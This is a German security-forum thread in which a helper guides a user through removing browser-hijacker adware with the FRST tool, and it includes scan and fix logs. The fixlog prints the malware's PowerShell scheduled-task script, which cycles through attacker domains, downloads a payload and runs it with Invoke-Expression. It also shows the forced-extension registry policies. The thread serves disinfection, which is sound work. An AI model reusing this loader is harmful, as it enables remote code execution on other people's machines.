C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe wurde durch den überwachten Ordnerzugriff daran gehindert, %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente zu ändern.
Erkennungszeit: 2024-07-20T12:46:03.035Z
Benutzer: SKYSGAMINGPC-CA\skysc
Pfad: %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente
Prozessname: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe
Sicherheitsversion: 1.415.174.0
Modulversion: 1.1.24060.5
Produktversion: 4.18.24060.7
Date: 2024-07-18 16:35:41
Description:
Der überwachte Ordnerzugriff hat C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe daran gehindert, Änderungen am Speicher durchzuführen.
Erkennungszeit: 2024-07-18T14:35:41.601Z
Benutzer: NT-AUTORITÄT\SYSTEM
Pfad: \Device\HarddiskVolume3
Name des Prozesses: C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
Sicherheitsversion: 1.415.150.0
Modulversion: 1.1.24060.5
Produktversion: 4.18.24060.7
Event[0]
Date: 2024-07-15 17:37:29
Description:
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Bei Zugriff
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden.
Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden.
Date: 2024-06-16 16:43:01
Description:
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Verhaltensüberwachung
Fehlercode: 0x80070002
Fehlerbeschreibung: Das System kann die angegebene Datei nicht finden.
Ursache: Der Filtertreiber benötigt eine aktuelles Modul. Sie müssen die neuesten Updates der Sicherheitsinformationen installieren, um Echtzeitschutz zu gewährleisten.
Date: 2024-06-15 22:05:17
Description:
Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features.
Feature: Netzwerkinspektionssystem
Fehlercode: 0x8007045b
Fehlerbeschreibung: Der Computer wird heruntergefahren.
Ursache: Dem System fehlen erforderliche Updates zum Ausführen des Netzwerkinspektionssystems. Installieren Sie die erforderlichen Updates, und starten Sie das Gerät neu.
Date: 2024-06-13 18:06:16
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Security Intelligence aufgetreten. Es wird versucht, zu einer vorherigen Version zurückzukehren.
Security Intelligence versucht: Sicherung
Fehlercode: 0x80004004
Fehlerbeschreibung: Vorgang abgebrochen
Security Intelligence-Version: 1.413.76.0;1.413.76.0
Modulversion: 1.1.24050.5
Date: 2024-06-13 18:06:16
Description:
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Security Intelligence aufgetreten. Es wird versucht, zu einer vorherigen Version zurückzukehren.
Security Intelligence versucht: Aktuell
Fehlercode: 0x80501102
Fehlerbeschreibung: Unerwartetes Problem. Installieren Sie bei Bedarf verfügbare Updates, und starten Sie das Programm dann erneut. Informationen zum Installieren von Updates finden Sie unter "Hilfe und Support".
Security Intelligence-Version: 1.413.266.0;1.413.266.0
Modulversion: 1.1.24050.5
CodeIntegrity:
===============
Date: 2024-07-22 21:19:08
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
Date: 2024-07-22 20:56:26
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Speicherinformationen ===========================
BIOS: American Megatrends International, LLC. A.B0 08/11/2022
Hauptplatine: Micro-Star International Co., Ltd. B550-A PRO (MS-7C56)
Prozessor: AMD Ryzen 7 5800X 8-Core Processor
Prozentuale Nutzung des RAM: 38%
Installierter physikalischer RAM: 32694.09 MB
Verfügbarer physikalischer RAM: 20043.84 MB
Summe virtueller Speicher: 43446.09 MB
Verfügbarer virtueller Speicher: 26378.02 MB
==================== Laufwerke ================================
Drive c: (Windows) (Fixed) (Total:1906.64 GB) (Free:43.73 GB) (Model: TEAM TM8FPD002T) NTFS
\\?\Volume{41e7a2f5-393b-493b-be00-74394b7a817d}\ (Recovery tools) (Fixed) (Total:0.98 GB) (Free:0.32 GB) NTFS
\\?\Volume{7b3d089e-4810-4004-aca0-af67060b3ad4}\ (SYSTEM) (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Partitionstabelle ====================
==========================================================
Disk: 0 (Size: 1907.7 GB) (Disk ID: BDAE7615)
Partition: GPT.
==================== Ende von Addition.txt =======================
|
|
23.07.2024, 13:48
| #3 |
| /// TB-Ausbilder   | Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Mein Name ist Matthias und ich werde dir bei der Analyse und Bereinigung deines Systems helfen. Ich analysiere deine Logdateien und melde mich in Kürze wieder. |
|
23.07.2024, 14:04
| #4 |
| /// TB-Ausbilder | Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Dein System ist mit neuer Adware/PUP infiziert, kein Grund zur Sorge. Wir kümmern uns darum. Wir beginnen mit einer Reparatur mit FRST. Dies kann einige Minuten dauern, bitte gedulde dich. Schritt 1 WARNUNG AN ALLE MITLESER !!! Dieses FRST-Skript ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System verwendet werden!
Schritt 2 Mit Schritt 1 wurde ein .zip Archiv mit dem Schema < Datum_Uhrzeit.zip > (z. B. 20.02.2024_11.33.52.zip) auf deinem Desktop erstellt.
|
|
23.07.2024, 14:38
| #5 |
| | Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Nach dem "Reparieren" mit FRST wurde ein Neustart benötigt. Die Meldung "Von Ihrer Organisation verwaltet" im Edge und Chrome, sind verschwunden. ps: ich habe das Archiv hochgeladen Fixlog: Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 21.07.2024
durchgeführt von skysc (23-07-2024 15:16:54) Run:1
Gestartet von C:\Users\skysc\Downloads\Neuer Ordner
Geladene Profile: skysc & zweisky
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
Start::
CreateRestorePoint:
CloseProcesses:
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [3952]
SearchScopes: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001 -> DefaultScope {748F61FA-2044-4035-AAD3-7322004BAF23} URL =
SearchScopes: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001 -> {748F61FA-2044-4035-AAD3-7322004BAF23} URL =
Toolbar: HKLM-x32 - Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Keine Datei
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [] => [X]
HKU\S-1-5-18\...\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] => C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (Keine Datei)
HKU\S-1-5-18\...\Run: [Norton Download ManagerFORCE_UPGRADE_22_23_5] => C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.23.5" (Keine Datei)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Keine Datei)
Task: {4BD989F5-A0B9-437E-81EE-C28C6C688B44} - System32\Tasks\MSI_GamebarConnect => "C:\Program Files (x86)\MSI\MSI Companion\Gamebar_Connect.exe" -run (Keine Datei)
Task: {70F898CB-5077-4047-A303-A8EBC1F66A90} - System32\Tasks\MSI_TraceFPS => "C:\Program Files (x86)\MSI\MSI Companion\MSI_TraceFPS.exe" (Keine Datei)
S2 DFWSIDService; C:\ProgramData\Wondershare\wsServices\WsidService.exe [X]
S2 ElevationService; C:\ProgramData\Wondershare\wsServices\ElevationService.exe [X]
S4 EsgShKernel; "C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe" [X]
S2 ShMonitor; "C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe" [X]
C:\Program Files\EnigmaSoft
S2 WirelessBackupService; C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone Basic - Deutsch\Addins\Recovery\WirelessBackupService.exe [X]
S2 Wondershare InstallAssist; C:\ProgramData\Wondershare\Service\InstallAssistService.exe [X]
2023-08-14 18:17 - 2023-08-14 18:17 - 000005998 _____ () C:\Users\skysc\AppData\Local\91094746112
2024-04-06 15:56 - 2024-04-06 15:56 - 000005998 _____ () C:\Users\skysc\AppData\Local\93293858673
2023-10-13 15:29 - 2023-10-13 15:29 - 000005998 _____ () C:\Users\skysc\AppData\Local\9437468409
CMD: type "C:\Windows\System32\KondSerp_Optimizer.ps1"
Task: {7FE0D883-DA2A-4259-AA1B-F2D690708800} - System32\Tasks\KondSerp_OptimizerV2 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [450560 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> -File C:/Windows/System32/KondSerp_Optimizer.ps1 <==== ACHTUNG
C:\Windows\System32\KondSerp_Optimizer.ps1
Reg: reg query "HKLM\SOFTWARE\Policies\Google" /S
Reg: reg query "HKLM\SOFTWARE\Policies\Microsoft\Edge" /S
HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG
Task: {8B4CA8A8-BDAC-4447-9FE7-4ABA29333A32} - System32\Tasks\SEO => C:\Users\skysc\AppData\Roaming\SEO\SEO.exe (Keine Datei) <==== ACHTUNG
C:\Users\skysc\AppData\Roaming\SEO
C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\fepbfegljfpfclgajmjlmnhdillncgke
Edge NewTab: Default -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html"
Edge NewTab: Profile 1 -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html"
C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdamghfpmkabflbpldhdpbbfofolgaji
CHR DefaultSearchURL: Default -> hxxps://qtrsearch.com/search?q={searchTerms}&s=rg&u=%USERID%
CHR DefaultSearchKeyword: Default -> qtr
CHR DefaultSuggestURL: Default -> hxxps://qtrsearch.com/suggest?q={searchTerms}
CMD: cscript /nologo %systemroot%\System32\slmgr.vbs /dlv
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh winhttp reset proxy
CMD: Bitsadmin /Reset /Allusers
CMD: Winmgmt /salvagerepository
CMD: Winmgmt /verifyrepository
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
Hosts:
RemoveProxy:
Zip: C:\FRST\Quarantine
EmptyTemp:
End::
*****************
CreateRestorePoint: Fehler(1=2%) -> Erstellen eines Wiederherstellungspunktes gescheitert.
Prozesse erfolgreich geschlossen.
C:\Users\Public\Shared Files => ":VersionCache" ADS erfolgreich entfernt
"HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{748F61FA-2044-4035-AAD3-7322004BAF23} => erfolgreich entfernt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}" => erfolgreich entfernt
HKLM\Software\Wow6432Node\Classes\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => konnte nicht entfernt werden. Zugriff verweigert.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt
"HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Norton Download ManagerFORCE_UPGRADE_22_22_9" => erfolgreich entfernt
"HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Norton Download ManagerFORCE_UPGRADE_22_23_5" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4BD989F5-A0B9-437E-81EE-C28C6C688B44}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4BD989F5-A0B9-437E-81EE-C28C6C688B44}" => erfolgreich entfernt
C:\Windows\System32\Tasks\MSI_GamebarConnect => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MSI_GamebarConnect" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{70F898CB-5077-4047-A303-A8EBC1F66A90}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{70F898CB-5077-4047-A303-A8EBC1F66A90}" => erfolgreich entfernt
C:\Windows\System32\Tasks\MSI_TraceFPS => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MSI_TraceFPS" => erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\DFWSIDService => erfolgreich entfernt
DFWSIDService => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\ElevationService => erfolgreich entfernt
ElevationService => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\EsgShKernel => erfolgreich entfernt
EsgShKernel => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\ShMonitor => erfolgreich entfernt
ShMonitor => Dienst erfolgreich entfernt
"C:\Program Files\EnigmaSoft" => nicht gefunden
HKLM\System\CurrentControlSet\Services\WirelessBackupService => erfolgreich entfernt
WirelessBackupService => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Wondershare InstallAssist => erfolgreich entfernt
Wondershare InstallAssist => Dienst erfolgreich entfernt
C:\Users\skysc\AppData\Local\91094746112 => erfolgreich verschoben
C:\Users\skysc\AppData\Local\93293858673 => erfolgreich verschoben
C:\Users\skysc\AppData\Local\9437468409 => erfolgreich verschoben
========= type "C:\Windows\System32\KondSerp_Optimizer.ps1" =========
[System.Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions")
$uid = '595e4c38-2e42-48d5-ba6f-2d886dd8e00e';
$wc = New-Object system.Net.WebClient;
$randomDelay = Get-Random -Minimum 0 -Maximum 51
Start-Sleep -Seconds $randomDelay
$services = ''
$base = "kondoserp1"
foreach ($i in 0..25) {
$suffix = [char]([int][char]'a' + $i)
$domain = "$base$suffix.com"
if ($i -eq 0) { $domain = "$base.com" }
$domain
try {
$url = "https://$domain/updaterTask/$uid"
$services = $wc.downloadString($url).Trim()
break
}
catch {
}
}
Invoke-Expression $services;
========= Ende von CMD: =========
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7FE0D883-DA2A-4259-AA1B-F2D690708800}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7FE0D883-DA2A-4259-AA1B-F2D690708800}" => erfolgreich entfernt
C:\Windows\System32\Tasks\KondSerp_OptimizerV2 => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\KondSerp_OptimizerV2" => erfolgreich entfernt
C:\Windows\System32\KondSerp_Optimizer.ps1 => erfolgreich verschoben
========= reg query "HKLM\SOFTWARE\Policies\Google" /S =========
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist
2 REG_SZ gdamghfpmkabflbpldhdpbbfofolgaji;https://clients2.google.com/service/update2/crx
========= Ende von Reg: =========
========= reg query "HKLM\SOFTWARE\Policies\Microsoft\Edge" /S =========
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist
2 REG_SZ fepbfegljfpfclgajmjlmnhdillncgke;https://edge.microsoft.com/extensionwebstorebase/v1/crx
========= Ende von Reg: =========
HKLM\SOFTWARE\Policies\Google => erfolgreich entfernt
HKLM\SOFTWARE\Policies\Microsoft\Edge => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8B4CA8A8-BDAC-4447-9FE7-4ABA29333A32}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B4CA8A8-BDAC-4447-9FE7-4ABA29333A32}" => erfolgreich entfernt
C:\Windows\System32\Tasks\SEO => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SEO" => erfolgreich entfernt
"C:\Users\skysc\AppData\Roaming\SEO" => nicht gefunden
"C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\fepbfegljfpfclgajmjlmnhdillncgke" Ordner verschieben:
C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\fepbfegljfpfclgajmjlmnhdillncgke => erfolgreich verschoben
"NewTab" => nicht gefunden
"NewTab" => nicht gefunden
"C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdamghfpmkabflbpldhdpbbfofolgaji" Ordner verschieben:
C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdamghfpmkabflbpldhdpbbfofolgaji => erfolgreich verschoben
"Chrome DefaultSearchURL" => erfolgreich entfernt
"Chrome DefaultSearchKeyword" => erfolgreich entfernt
"Chrome DefaultSuggestURL" => erfolgreich entfernt
========= cscript /nologo %systemroot%\System32\slmgr.vbs /dlv =========
Softwarelizenzierungsdienst-Version: 10.0.22621.3880
Name: Windows(R), Core edition
Beschreibung: Windows(R) Operating System, RETAIL channel
Aktivierungs-ID: 2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8
Anwendungs-ID: 55c92734-d682-4d71-983e-d6ec3f16059f
Erweiterte PID: 03612-03261-000-000000-00-1031-22621.0000-1732022
Product Key-Kanal: Retail
Installations-ID: 075996267584201613853913300654863666871364796794687444903607682
Lizenz-URL verwenden: https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
URL fr die šberprfung: https://validation-v2.sls.microsoft.com/SLWGA/slwga.asmx
Teil-Product Key: 8HVX7
Lizenzstatus: Lizenziert
Verbleibende Windows Rearm-Anzahl: 999
Verbleibende SKU Rearm-Anzahl: 999
Vertrauenswrdige Zeit: 23.07.2024 15:16:59
========= Ende von CMD: =========
========= netsh winsock reset =========
Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.
========= Ende von CMD: =========
========= netsh advfirewall reset =========
OK.
========= Ende von CMD: =========
========= netsh advfirewall set allprofiles state ON =========
OK.
========= Ende von CMD: =========
========= netsh winhttp reset proxy =========
Aktuelle WinHTTP-Proxyeinstellungen:
DirectAccess (kein Proxyserver).
========= Ende von CMD: =========
========= Bitsadmin /Reset /Allusers =========
BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.
{24712D51-0265-4DD1-9A9F-10D85D234EB2} canceled.
{C04FB904-E1E2-4F4A-85B0-A424A3DCD441} canceled.
2 out of 2 jobs canceled.
========= Ende von CMD: =========
========= Winmgmt /salvagerepository =========
Das WMI-Repository ist konsistent.
========= Ende von CMD: =========
========= Winmgmt /verifyrepository =========
Das WMI-Repository ist konsistent.
========= Ende von CMD: =========
========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========
========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========
========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========
========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========
C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
========= Ende von RemoveProxy: =========
================== Zip: ===================
C:\FRST\Quarantine -> erfolgreich kopiert zu C:\Users\skysc\Desktop\23.07.2024_15.17.12.zip
=========== Zip: Ende ===========
=========== EmptyTemp: ==========
FlushDNS => abgeschlossen
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 1865877967 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 1007539846 B
Windows/system/drivers => 83782042 B
Edge => 0 B
Chrome => 7019904 B
Brave => 30143246 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 540235839 B
systemprofile32 => 540236976 B
LocalService => 543039313 B
NetworkService => 543321409 B
skysc => 3881722265 B
zweisky => 3881746231 B
RecycleBin => 10107860 B
EmptyTemp: => 12 GB temporäre Dateien entfernt.
================================
Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 23-07-2024 15:30:53)
Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart:
HKLM\Software\Wow6432Node\Classes\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => konnte nicht entfernt werden. Zugriff verweigert.
==== Ende vom Fixlog 15:30:53 ====
|
|
23.07.2024, 20:16
| #6 |
| /// TB-Ausbilder | Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Gut gemacht. Nun bitte noch eine Kontrolle mit FRST sowie SecurityCheck ausführen. Schritt 1
Schritt 2 Führe SecurityCheck (SC) gemäß der bebilderten Anleitung aus und füge die Logdatei als Anhang hinzu. |
|
24.07.2024, 21:10
| #7 |
| | Windows 11: Policy in Edge Und Chrome Browser nicht deaktivierbar, lädt Beautiful New Tab(Edge) und Qtr Search(Chrome) Hijacker Erweiterung Ich bedanke mich schonmal für die hilfe FRST Log: FRST Logfile: Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 24.07.2024
durchgeführt von skysc (Administrator) auf SKYSGAMINGPC-CA (Micro-Star International Co., Ltd. MS-7C56) (24-07-2024 22:01:03)
Gestartet von C:\Users\skysc\Downloads\Neuer Ordner\FRST64 (1).exe
Geladene Profile: skysc
Plattform: Microsoft Windows 11 Home Version 23H2 22631.3880 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Edge
Start-Modus: Normal
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(A225F3B5-240D-4EE9-BCF4-697A07F5E93E -> Micro-Star INT'L CO., LTD.) C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSICenter_2.0.38.0_x64__kzh8wxbdkxb8p\DCv2\DCv2.exe
(Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler.exe
(Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler64.exe
(C:\Program Files (x86)\MSI\MSI Center\MSI.CentralServer.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Program Files (x86)\MSI\MSI Center\Engine\CC_Engine_x64.exe
(C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\MSI.CentralServer.exe
(C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.256.0.2\OverwolfHelper.exe
(C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.256.0.2\OverwolfHelper64.exe
(C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\0.256.0.2\OverwolfBrowser.exe <4>
(C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Users\skysc\AppData\Local\Overwolf\ProcessCache\0.256.0.2\cchhcaiapeikjbdbpfplgmpobbcdkdaphclbmkbj\curseforge.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe ->) (Malwarebytes Inc. -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.AlwaysOnTop.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.Awake.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.ColorPickerUI.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.CropAndLock.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.PowerLauncher.exe
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\WinUI3Apps\PowerToys.Peek.UI.exe
